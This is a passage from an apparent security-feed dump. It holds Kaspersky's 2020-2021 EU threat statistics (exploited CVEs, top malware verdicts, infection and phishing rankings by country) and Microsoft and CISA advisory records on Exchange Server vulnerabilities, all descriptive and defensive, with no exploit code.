This vulnerability was most likely used by the APT group [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) at the first stage of system compromise, after which the payload was delivered by an additional exploit that escalated privileges in the system;\n * CVE-2020-0986 in the GDI Print/Print Spooler component of Microsoft's Windows operating system, enabling manipulation of process memory for arbitrary code execution in the context of a system service process. Exploitation of this vulnerability gives attackers the ability to bypass sandboxes, for example, in the browser.\n\nThe first quarter of 2021 turned out to be rich not only in well-known vulnerabilities, but also in zero-day ones. In particular, both [IT security specialists](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals showed great interest in the new Microsoft Exchange Server vulnerabilities:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) \u2014 a Server-Side Request Forgery vulnerability that allows an attacker to make a forged server request and execute arbitrary code (RCE);\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) \u2014 insecure object deserialization by the Unified Messaging service, which can lead to arbitrary code execution on the server side;\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) \u2014 allows an attacker to write data to server files, which can also lead to remote code execution;\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) \u2014 similar to [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), this vulnerability allows an authorized Microsoft Exchange user to write arbitrary code to system files.\n\nThese vulnerabilities were found 
[in-the-wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and had been used by APT and ransomware groups.\n\nOne more constellation of vulnerabilities that appeared in the infosec sky was a threesome of critical bugs in the popular SolarWinds Orion Platform \u2013 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>), [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>). Successful exploitation of any of them can cause infection of the system where the platform is installed (mostly, enterprise and government PCs).\n\n_Distribution of exploits used in attacks by type of application attacked, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124650/08-en-european-ksb-2021.png>))_\n\n_The rating of vulnerable applications is based on verdicts by Kaspersky products for blocked exploits used by cybercriminals both in network attacks and in vulnerable local apps, including on users' mobile devices._\n\nNetwork attacks were the most common method of system penetration, and a significant portion of them is made up of brute-force attacks on various network services: [RDP](<https://securelist.com/remote-spring-the-rise-of-rdp-bruteforce-attacks/96820/>), Microsoft SQL Server, etc. In addition, the year gone by demonstrated that everything in the Windows operating system is cyclical, and that most of the detected vulnerabilities exist in the same services, for example, in the drivers of the SMB (SMBGhost, SMBBleed), DNS (SigRed) and ICMPv6 (BadNeighbor) network protocols. Two critical vulnerabilities (CVE-2020-0609, CVE-2020-0610) were found in the Remote Desktop Gateway service. An interesting vulnerability, dubbed Zerologon, was also discovered in the NetLogon service. 
In Q1 2021, researchers found three new vulnerabilities in Windows network stack code related to IPv4/IPv6 protocol processing \u2014 [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>). Lastly, despite the fact that exploits for the EternalBlue and EternalRomance families are old, they are still used by attackers.\n\n## Attacks on macOS\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 14.50 \n2 | AdWare.OSX.Bnodlero.at | 12.04 \n3 | AdWare.OSX.Bnodlero.ay | 11.42 \n4 | AdWare.OSX.Bnodlero.ax | 10.56 \n5 | AdWare.OSX.Bnodlero.bg | 9.18 \n6 | Trojan-Downloader.OSX.Shlayer.a | 8.06 \n7 | AdWare.OSX.Pirrit.j | 6.23 \n8 | AdWare.OSX.Pirrit.ac | 6.05 \n9 | AdWare.OSX.Ketin.h | 5.30 \n10 | AdWare.OSX.Bnodlero.t | 4.94 \n11 | AdWare.OSX.Bnodlero.av | 4.82 \n12 | Trojan-Downloader.OSX.Agent.h | 4.48 \n13 | AdWare.OSX.Pirrit.o | 4.35 \n14 | AdWare.OSX.Cimpli.k | 3.75 \n15 | AdWare.OSX.Pirrit.gen | 3.75 \n16 | AdWare.OSX.Pirrit.aa | 3.58 \n17 | AdWare.OSX.Ketin.m | 3.22 \n18 | AdWare.OSX.Pirrit.q | 3.20 \n19 | AdWare.OSX.Ketin.l | 3.13 \n20 | AdWare.OSX.Spc.a | 2.87 \n \n_* The share of unique users who encountered this threat in the total number of users of Kaspersky security solutions for macOS who were attacked._\n\n### Threat geography\n\n_Geography of attacked macOS users in EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124726/09-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked macOS users **\n\n| **Country** | **%*** \n---|---|--- \n1 | France | 15.32 \n2 | Spain | 13.99 \n3 | Italy | 11.43 \n4 | Portugal | 9.75 \n5 | Greece | 9.59 \n6 | Germany | 9.41 \n7 | Hungary | 8.60 \n8 | Lithuania | 
8.14 \n9 | Poland | 8.10 \n10 | Belgium | 7.94 \n \n_* The share of unique users attacked in the total number of users of Kaspersky security solutions for macOS in the country._\n\n## IoT attacks\n\n### IoT threat statistics\n\nDuring the reporting period, more than 80% of attacks on Kaspersky traps were carried out using the Telnet protocol.\n\nTelnet | 81.31% \n---|--- \nSSH | 18.69% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, May 2020 \u2013 April 2021_\n\nAs for distribution of sessions, Telnet also prevails, accounting for three quarters of all working sessions.\n\nTelnet | 75.66% \n---|--- \nSSH | 24.34% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, May 2020 \u2013 April 2021_\n\nAs a result, devices that carried out attacks using the Telnet protocol were selected to build the map of attackers' IP addresses.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124758/10-en-european-ksb-2021.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 26.84 \n2 | Italy | 18.55 \n3 | Germany | 7.92 \n4 | Spain | 7.46 \n5 | Poland | 5.66 \n6 | France | 5.60 \n7 | Romania | 5.52 \n8 | Sweden | 4.52 \n9 | Netherlands | 3.65 \n10 | Hungary | 2.95 \n \n_* The share of devices from which attacks were carried out in the given country in the total number of devices._\n\n### Malware loaded into honeypots\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 42.57 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.96 \n3 | Backdoor.Linux.Mirai.ba | 9.79 \n4 | Backdoor.Linux.Gafgyt.a | 5.42 \n5 | Backdoor.Linux.Gafgyt.a | 2.74 \n6 | Backdoor.Linux.Gafgyt.bj | 1.44 \n7 | Trojan-Downloader.Shell.Agent.p | 1.31 \n8 | 
Backdoor.Linux.Agent.bc | 1.20 \n9 | Backdoor.Linux.Mirai.cw | 1.15 \n10 | Backdoor.Linux.Mirai.cn | 0.82 \n \n_* The share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose, and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of the specific IP address (GeoIP) is established._\n\nKaspersky solutions in the EU blocked **115,452,157 **attacks launched from online resources across the globe. Moreover, 89.33% of these resources were located in just 10 countries.\n\n_Distribution of web attack sources by country, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124836/11-en-european-ksb-2021.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\n_To assess the risk of online infection faced by EU users, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the reporting period. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries._\n\nThis rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware. Overall, during the reporting period, adware and its components were registered on **89.60%** of users' computers on which Web Anti-Virus was triggered.\n\n_Geography of malicious web-based attacks, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124905/12-en-european-ksb-2021.png>))_\n\nOn average, **13.70% **of Internet user computers in the EU experienced at least one Malware-class attack during the reporting period.\n\n**Top 10 EU countries where users faced the greatest risk of online infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Latvia | 21.11 \n2 | Greece | 18.50 \n3 | Estonia | 17.52 \n4 | France | 16.81 \n5 | Bulgaria | 14.86 \n6 | Italy | 14.76 \n7 | Portugal | 14.44 \n8 | Lithuania | 14.21 \n9 | Hungary | 13.82 \n10 | Poland | 13.17 \n \n_* The share of unique users targeted by Malware-class attacks in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious programs most actively used in online attacks\n\nDuring the reporting period, Kaspersky's Web Anti-Virus detected **377,685 **unique malicious objects (scripts, exploits, executable files, etc.), as well as **2,676,988 **unique malicious URLs on which Web Anti-Virus was triggered. 
Based on the collected data, we identified the 20 most actively used malicious programs in online attacks on users' computers.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | Blocked | 49.22 \n2 | Trojan.Script.Generic | 12.52 \n3 | Hoax.HTML.FraudLoad.m | 8.38 \n4 | Trojan.PDF.Badur.gen | 2.46 \n5 | Trojan.Script.Agent.dc | 2.16 \n6 | Trojan.Multi.Preqw.gen | 2.11 \n7 | Trojan-Downloader.Script.Generic | 1.99 \n8 | Trojan.Script.Miner.gen | 1.56 \n9 | Exploit.MSOffice.CVE-2017-11882.gen | 1.02 \n10 | Trojan-PSW.Script.Generic | 0.91 \n11 | DangerousObject.Multi.Generic | 0.74 \n12 | Trojan.BAT.Miner.gen | 0.74 \n13 | Trojan.MSOffice.SAgent.gen | 0.60 \n14 | Trojan.Script.SAgent.gen | 0.50 \n15 | Trojan-Downloader.MSOffice.SLoad.gen | 0.47 \n16 | Trojan-Downloader.Win32.Upatre.pef | 0.33 \n17 | Trojan-Downloader.JS.Inor.a | 0.30 \n18 | Trojan-Downloader.MSWord.Agent.btl | 0.30 \n19 | Hoax.Script.Dating.gen | 0.27 \n20 | Trojan-Downloader.JS.SLoad.gen | 0.27 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of attacks by the given malicious program in the total number of Malware-class web attacks registered on the computers of unique users of Kaspersky products._\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable storage media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.). 
These statistics additionally include objects detected on user computers after the first system scan by Kaspersky's Anti-Virus application._\n\n_This section analyzes statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, as well as the results of scanning removable storage media._\n\n### Countries where users faced the highest risk of local infection\n\n_For each country in the EU, we calculated how often users there encountered a File Anti-Virus triggering during the year. Included are detections of objects found on user computers or removable media connected to them (flash drives, camera/phone memory cards, external hard drives). These statistics reflect the level of personal computer infection in different countries._\n\n_Geography of local infections by malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124941/13-en-european-ksb-2021.png>))_\n\nDuring the reporting period, on average, at least one piece of malware was detected on **18.77%** of computers, hard drives or removable media belonging to KSN users in the EU.\n\n**Top 10 EU countries where users faced the greatest risk of local infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 32.60 \n2 | Bulgaria | 31.55 \n3 | Latvia | 31.38 \n4 | Estonia | 29.48 \n5 | Hungary | 27.88 \n6 | Lithuania | 27.11 \n7 | Portugal | 26.01 \n8 | Cyprus | 25.43 \n9 | Italy | 24.64 \n10 | Spain | 23.57 \n \n_* The share of unique users on whose computers Malware-class local threats were blocked in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious objects detected on user computers\n\nWe identified the 20 most commonly detected threats on EU users' computers during the reporting period. 
Not included are Riskware-type programs and adware.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 19.45 \n2 | Trojan.Multi.BroSubsc.gen | 18.53 \n3 | Trojan.Script.Generic | 8.29 \n4 | Trojan.Multi.GenAutorunReg.a | 7.08 \n5 | Trojan.Multi.Misslink.a | 6.75 \n6 | Hoax.Win32.DriverToolKit.b | 2.77 \n7 | Trojan.MSOffice.SAgent.gen | 2.63 \n8 | Exploit.Script.Generic | 2.25 \n9 | Trojan.Win32.SEPEH.gen | 2.00 \n10 | Trojan-Downloader.Script.Generic | 1.91 \n11 | Worm.Win32.WBVB | 1.53 \n12 | Hoax.Win32.Uniblue.gen | 1.33 \n13 | Trojan.Script.Agent.gen | 1.29 \n14 | Trojan-Dropper.Win32.Scrop.adwo | 1.17 \n15 | Trojan.Multi.GenAutorunTask.c | 1.16 \n16 | Trojan.Win32.Generic | 1.12 \n17 | Trojan.Multi.GenBadur.gen | 1.10 \n18 | Trojan.BAT.Miner.gen | 1.09 \n19 | Trojan.Multi.GenAutorunTask.b | 1.07 \n20 | Trojan.Multi.GenAutorunTaskFile.a | 1.05 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of unique users on whose computers File Anti-Virus detected the given object in the total number of unique users of Kaspersky products whose Anti-Virus was triggered by malware._\n\n## Phishing in the EU\n\n### Phishing trends\n\n * **Cloud phishing**\n\nWe observed that the number of EU-targeted phishing resources on cloud platforms and hosting sites approximately doubled during the reporting period.\n\n * **Cryptocurrency**\n\nThe number of cryptocurrency-related phishing detections tripled. This category consists of fraudulent sites somehow linked to cryptocurrencies: in most cases, they are fake crypto exchanges that require users to invest money to gain access to an account that allegedly already contains complimentary currency. 
In fact, users just lose their own money if they try to buy access to such sites.\n\nAnother particularly interesting type of phishing we observed in the EU is a mixture of cryptocurrency and COVID-19 themes: fake sites offering COVID-19 vaccines for cryptocurrency.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19131933/European_KSB_2021.jpeg>)\n\n**_Example of fake COVID-19 vaccine offer_**\n\n * **Targeted extortion**\n\nIn late August 2020, we saw some unusual extortion messages. In them, cybercriminals claimed to have planted TNT somewhere in the recipient's office, saying it would be detonated unless a ransom was paid or if police activity was observed near the building.\n\nWhereas individuals are asked to cough up the equivalent of $500\u20131,000 in bitcoin (the maximum we saw was around $5,000), for companies supposedly rigged with explosives the amount rises to roughly $20,000. The bulk of the scam e-mails are written in German, but we found English versions as well.\n\n * **Microsoft Office spear phishing**\n\nThe trend for harvesting Microsoft 365 credentials through spear phishing continues to evolve. Such phishing e-mails normally contain a hyperlink to a fake website. Sure enough, once many people had absorbed that simple precaution, phishers began replacing the links with attached HTML files, the sole purpose of which is to automate redirection. Clicking on the HTML attachment opens it in a browser. As far as the phishing aspect goes, the file has just one line of code (javascript: window.location.href) with the phishing website address as a variable. 
It forces the browser to open the website in the same window.\n\n### Phishing attacks\n\nIn total, **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU, representing 21.89% of all phishing attacks around the world during the reporting period.\n\n_EU share of phishing detections, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125028/15-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nDuring the reporting period, approximately **13.4%** of users of Kaspersky solutions in the EU encountered at least one phishing attack.\n\n_Geography of EU phishing, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125056/14-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries where users faced phishing attacks**\n\n| **Country** | **%*** \n---|---|--- \n1 | Portugal | 18.34 \n2 | France | 17.98 \n3 | Belgium | 15.10 \n4 | Greece | 14.98 \n5 | Hungary | 14.87 \n6 | Italy | 14.44 \n7 | Slovakia | 12.77 \n8 | Spain | 12.74 \n9 | Poland | 12.47 \n10 | Latvia | 12.26 \n \n_* The share of unique users targeted by phishing attacks in the total number of unique users of Kaspersky products in the country._\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nPandemic-related events affected the distribution of phishing attacks across the categories of targeted organizations. 
However, the largest categories remained unchanged as they have done for several years: in the EU during the reporting period, these were Global Internet portals (16.08%), Online stores (15.73%) and Payment systems (13.67%).\n\n_Share of phishing categories in the EU, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125126/16-en-european-ksb-2021.png>))_\n\n### Top-level domain (TLD) usage\n\nIn the share of EU top-level domains (TLDs), we include all national TLDs belonging to EU member states. In the reporting period, this share amounted to 7.27%.\n\n_Distribution of phishing domains by top-level domain, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125153/17-en-european-ksb-2021.png>))_\n\nThe share decreased significantly (-3 p.p.) at the end of 2020, but in Q1 2021 we observed a slight increase to 5.26%.\n\n_Timeline of share of EU top-level domains, Q2 2020 \u2013 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125220/18-en-european-ksb-2021.png>))_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19134557/eu_flag.jpg>) | **The project leading to this report has received funding from the European Union's Horizon 2020 research and innovation programme under grant agreement No 883464.** \n---|---", "cvss3": {}, "published": "2021-05-26T10:00:32", "type": "securelist", "title": "Kaspersky Security Bulletin 2020-2021. 
EU statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-26T10:00:32", "id": "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "href": "https://securelist.com/kaspersky-security-bulletin-2020-2021-eu-statistics/102335/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-12-03T15:51:43", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. We strongly urge customers to immediately update systems. Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T07:00:00", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T07:00:00", "id": "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "href": "https://msrc.microsoft.com/blog/2021/03/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:07:39", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. We strongly urge customers to immediately update systems. Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T07:00:00", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T07:00:00", "id": "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "href": "/blog/2021/03/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T18:53:05", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065. Microsoft will continue to monitor these threats and provide updated tools and investigation guidance to help organizations defend against, identify, and remediate associated attacks.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:44:28", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T18:44:28", "id": "MSRC:ED939F90BDE8D7A32031A750388B03C9", "href": "https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T15:51:43", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:8F98074A1D86F9B965ADC16597E286ED", "href": "https://msrc.microsoft.com/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-03-10T18:11:04", "description": "Microsoft has released out-of-band security updates to address vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019. A remote attacker can exploit three remote code execution vulnerabilities\u2014CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065\u2014to take control of an affected system and can exploit one vulnerability\u2014CVE-2021-26855\u2014to obtain access to sensitive information. 
